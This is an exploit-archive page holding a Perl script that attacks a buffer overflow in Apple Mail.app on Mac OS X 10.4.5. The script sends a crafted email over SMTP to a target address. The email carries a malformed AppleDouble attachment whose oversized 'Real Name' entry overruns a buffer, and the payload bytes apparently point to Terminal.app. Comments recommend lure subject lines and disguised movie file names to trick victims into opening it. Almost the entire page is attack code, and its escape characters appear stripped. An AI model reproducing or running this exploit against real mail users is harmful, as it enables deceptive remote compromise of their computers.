Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Apple Mac OS X 10.4.5 Mail.app (Real Name) Buffer Overflow Exploit
# Published : 2006-03-13
# Author : Kevin Finisterre
# Previous Title : PeerCast <= 0.1216
# Next Title : PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit
#!/usr/bin/perl
#
# Code by Kevin Finisterre kf_lists[at]digitalmunition[dot]com
# http://www.digitalmunition.com 
#
# Mail.app Version 2.0.7 (746.2) on OSX 10.4.5 Build 8H14 + Security Update 2006-001 (PowerPC) v1.0
#
# RFC-1740 MIME-based Mac file buffer overflow
# 
# AppleSingle file header:
# [4 byte magic number][4 byte version number][16 bytes of filler][2 byte number of entries][Entry...]
# Entry descriptor for each Entry:
# [4 byte entry id][4 byte offset][4 byte length]
# Real Name entry id is 0x03, Finder Info is 0x09 and Resource Fork is 0x02
#
# If this exploit is not working clean out your ~/Library/Mail Downloads folder
#
# ./SuperTastey.pl mx.yourhost.com yourmac@someplace.com
#
use IO::Socket;
use MIME::Base64;
$hostName = $ARGV[0];
$emailaddy = $ARGV[1];

$sock = IO::Socket::INET->new (Proto => "tcp", PeerAddr => $hostName, PeerPort => 25, Type => SOCK_STREAM);
$sock or die "no socket :$!n"; 
print $sock "EHLO [192.168.1.7]rn" .
"MAIL FROM:<root>rn" .   # This needs to be valid for what ever server you are using. 
"RCPT TO:<$emailaddy>rn" .	      # Target machine goes email address here. 
"DATArn" .
"Mime-Version: 1.0 (Apple Message framework v746.2)rn" .
"To: kfinisterre@blah.comrn" .
"Message-Id: <1AE65A5B-6E3A-479B-8ECB-8BC4D959A69A@blah.comrn" .
"Content-Type: multipart/mixed; boundary=Apple-Mail-3-188295813rn" .
"From: root <root>rn" .
"Subject: Dude you have to see this shit!rn" .
"Date: Mon, 6 Mar 2006 23:04:12 -0500rn" .
"X-Mailer: Apple Mail (2.746.2)rn" .
"rn" .
"rn" .
"--Apple-Mail-3-188295813rn" .
"Content-Type: multipart/appledouble;rn" .
"tboundary=Apple-Mail-4-188295813rn" .
"Content-Disposition: attachmentrn" .
"rn" .
"rn" .
"--Apple-Mail-4-188295813rn" .
"Content-Transfer-Encoding: base64rn" .
"Content-Type: application/applefile;rn" .
"tname="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.mov"rn" .
"Content-Disposition: attachment;rn" .
"tfilename*1=CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC.movrn" .
"rn";

$retaddr = "x41x42x43x44";  # Shit the spec says printable ASCII!

$bufferz  = 

"x00x05x16x07".	# AppleDouble Magic Number
"x00x02x00x00".	# Version 2
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".	# 16 Bytes of <null> filler
"x00x03x00x00".	# Number of entries (3)
"x00x09x00x00".	# Entry ID 9 is for 'Finder Info'
"x00x3ex00x00".	# Start of Finder Info data is at file offset 0x3e
"x00x0ax00x00".	# Length of Finder Info is 0x0a or 10
"x00x03x00x00".	# Entry ID 3 is for 'Real Name'
"x00x48x00x00".	# Start of Real Name data is at file offset 0x48
"x00xf5x00x00".	# Length of Real Name is 0xf5 or 245
"x00x02x00x00".	# Entry ID 2 is for 'Resource Fork'
"x01x3dx00x00".	# Start of Resource Fork is at file offset 0x013d
"x05x3ax00x00".	# Length of Resource fork is 0x053a
"x00x00x00x00".	# <null> filler
"x00x00x00x00".	# <null> filler
"aa" x 109 . "0000" . "1111" .  "2222" . "$retaddr" x 1 . "3333" . "zzz.mov." . # remember this length is hard coded above. 
# Anything over 11 chars is here not seen by the user try Something like NakedChicks...mov 
# or SuperTastey...mov don't forget the trailing '.' both .mov and .jpg work well from a Visual standpoint
#
# No fscking clue what this is... it is stolen from MetaSploit. 
# I think its just a resource fork. 
"x00x01x00x00x00x05x08x00x00x04x08x00x00x00x32x00". 
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x04x04x00x00x00x25x2fx41x70x70x6cx69".
"x63x61x74x69x6fx6ex73x2fx55x74x69x6cx69x74x69x65".
"x73x2fx54x65x72x6dx69x6ex61x6cx2ex61x70x70x00xec".
"xecxecxffxecxecxecxffxecxecxecxffxecxecxecxffxec".
"xecxecxffxecxecxecxffxe1xe1xe1xffxe1xe1xe1xffxe1".
"xe1xe1xffxe1xe1xe1xffxe1xe1xe1xffxe1xe1xe1xffxe1".
"xe1xe1xffxe1xe1xe1xffxe6xe6xe6xffxe6xe6xe6xffxe6".
"xe6xe6xffxe6xe6xe6xffxe6xe6xe6xffxe6xe6xe6xffxe6".
"xe6xe6xffxe6xe6xe6xffxe9xe9xe9xffxe9xe9xe9xffxe9".
"xe9xe9xffxe9xe9xe9xffxe9xe9xe9xffxe9xe9xe9xffxe9".
"xe9xe9xffxe9xe9xe9xffxecxecxecxffxecxecxecxffxec".
"xecxecxffxecxecxecxffxecxecxecxffxecxecxecxffxec".
"xecxecxffxecxecxecxffxefxefxefxffxefxefxefxffxef".
"xefxefxffxefxefxefxffxefxefxefxffxefxefxefxffxef".
"xefxefxffxefxefxefxffxf3xf3xf3xffxf3xf3xf3xffxf3".
"xf3xf3xffxf3xf3xf3xffxf3xf3xf3xffxf3xf3xf3xffxf3".
"xf3xf3xffxf3xf3xf3xffxf6xf6xf6xffxf6xf6xf6xffxf6".
"xf6xf6xffxf6xf6xf6xffxf6xf6xf6xffxf6xf6xf6xffxf6".
"xf6xf6xffxf6xf6xf6xffxf8xf8xf8xffxf8xf8xf8xffxf8".
"xf8xf8xffxf8xf8xf8xffxf8xf8xf8xffxf8xf8xf8xffxf8".
"xf8xf8xffxf8xf8xf8xffxfcxfcxfcxffxfcxfcxfcxffxfc".
"xfcxfcxffxfcxfcxfcxffxfcxfcxfcxffxfcxfcxfcxffxfc".
"xfcxfcxffxfcxfcxfcxffxffxffxffxffxffxffxffxffxff".
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff".
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff".
"xffxffxffxffxffxffxffxffxffxffxffxffxffxffxffxff".
"xffxffxffxffxffxffxa8x00x00x00xa8x00x00x00xa8x00".
"x00x00xa8x00x00x00xa8x00x00x00xa8x00x00x00xa8x00".
"x00x00xa8x00x00x00x2ax00x00x00x2ax00x00x00x2ax00".
"x00x00x2ax00x00x00x2ax00x00x00x2ax00x00x00x2ax00".
"x00x00x2ax00x00x00x03x00x00x00x03x00x00x00x03x00".
"x00x00x03x00x00x00x03x00x00x00x03x00x00x00x03x00".
"x00x00x03x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x01x00x00x00".
"x05x08x00x00x04x08x00x00x00x32x00x5fxd0xacx12xc2".
"x00x00x00x1cx00x32x00x00x75x73x72x6fx00x00x00x0a".
"x00x00xffxffx00x00x00x00x01x0dx21x7c";

print $sock encode_base64($bufferz) .
"rn" .
"--Apple-Mail-4-188295813rn" .
"Content-Transfer-Encoding: 8bitrn" .
"Content-Id: <1A628FD3-CED7-4C69-B5A6-5ABA7AEB2891@local>rn" .
"Content-Type: video/quicktime;rn" .
"tx-mac-type=0;rn" .
"tx-unix-mode=0755;rn" .
"tx-mac-creator=0;rn" .
"tname="DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD.mov"rn" .
"Content-Disposition: attachment;rn" .
"tfilename*0=EEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE.mov;rn" .
#"rnFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF!rn" .
"rn" . "Z" x 90000 . "rn" .
"--Apple-Mail-4-188295813--rn" .
"rn" .
"--Apple-Mail-3-188295813--rn" .
".rn";
sleep 2;  # Allow enough time for the message to process before leaving 

# www.Syue.com [2006-03-13]